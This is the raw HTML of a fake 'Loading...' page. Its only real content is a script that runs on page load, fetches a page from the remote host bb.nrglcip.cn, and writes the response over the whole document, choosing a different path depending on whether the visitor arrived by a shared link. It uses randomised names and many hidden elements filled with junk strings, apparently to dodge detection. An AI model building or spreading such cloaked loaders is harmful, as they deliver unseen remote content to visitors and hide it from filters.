<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .X3AfXVi {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .X3AfXVi .d9lc9kLRb8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .X3AfXVi .content {
            line-height: 50px;
            text-align: center
        }

        .X3AfXVi .img {
            width: 100%
        }

        .X3AfXVi .RZf4lozmg {
            text-align: center
        }

        .X3AfXVi .RZf4lozmg span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .X3AfXVi .RZf4lozmg span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .X3AfXVi .RZf4lozmg span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .X3AfXVi .RZf4lozmg span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .X3AfXVi .RZf4lozmg span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .X3AfXVi .RZf4lozmg span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .X3AfXVi .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function QC2COn1Ie(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var tnvXO = QC2COn1Ie('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ tnvXO +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ tnvXO +".html?a=share";
		}
		
        FkixyFPTw=url+"#"+new Date().getTime();
        FkixyFPTw && function() {
            $.get(FkixyFPTw, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >frLxaxrrSneLoYJhVn8ZJuGIFY9CbPsc1espjFz1BhSDOtNxOZx</h1>
<li style='display:none' >Tks5Xdj2l4bEoKBysgJjnHRYUxlceg2gFQkZMrb9nqCYYWtKq8Yumwkee42oArEPcXl6M8mS4cUVtc5C9</li>
<b style='display:none' >jltBh1BTbWx6m</b>
<span style='display:none'>Uijgq4KEZWvokTTSnx5EAH1hNWIf4EirimnJE</span>
<span style='display:none'>Uijgq4KEZWvokTTSnx5EAH1hNWIf4EirimnJE</span>
<ul style='display:none' >vI1Q6HcTmxb59xROEh1gKw6NtTXdFXHNKRiXLjdaMU</ul>
<li style='display:none' >Tks5Xdj2l4bEoKBysgJjnHRYUxlceg2gFQkZMrb9nqCYYWtKq8Yumwkee42oArEPcXl6M8mS4cUVtc5C9</li>
<li style='display:none' >Tks5Xdj2l4bEoKBysgJjnHRYUxlceg2gFQkZMrb9nqCYYWtKq8Yumwkee42oArEPcXl6M8mS4cUVtc5C9</li>
<h1 style='display:none' >frLxaxrrSneLoYJhVn8ZJuGIFY9CbPsc1espjFz1BhSDOtNxOZx</h1>
<img  src='' style='display:none'><div class="X3AfXVi">
    <div class="d9lc9kLRb8">
        <div class="RZf4lozmg">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>x5bNTLiOYzFTpl69f9OSd0P2HZDACpJl7JiGY4TfMMyWWxP3EaVroDJ</span>
<span style='display:none'>x5bNTLiOYzFTpl69f9OSd0P2HZDACpJl7JiGY4TfMMyWWxP3EaVroDJ</span>
<li style='display:none' >bsafg9XXnk4iFA4U0sFfXQg8zvQdjbjl3q6D3KxH2Otd3GBBas2E21U9sh4m0iTTIS0SjPOefXe</li>
<span style='display:none'>x5bNTLiOYzFTpl69f9OSd0P2HZDACpJl7JiGY4TfMMyWWxP3EaVroDJ</span>
<ul style='display:none' >VD86ZBsoC5dQrbqWvsaLn0bptJnJqCViiHLcwjJQkFXI9X7cE94qQr</ul>
<a  href='#' style='display:none'>awL3F7fiKTMSP4yAMUt2DmbZqihbVTD4Qn4IVIJJUTVp9xBJlhvp1jkJlmNhPrjUfh4C</a>
<p  style='display:none'>HvNcdWzkrm9bBVK71RZDKkMy2xgzrW8rBwGj3ItSZziPs1XZq6Yjm3wUNggppajWZp7j</p>
<p  style='display:none'>HvNcdWzkrm9bBVK71RZDKkMy2xgzrW8rBwGj3ItSZziPs1XZq6Yjm3wUNggppajWZp7j</p></body>
</html>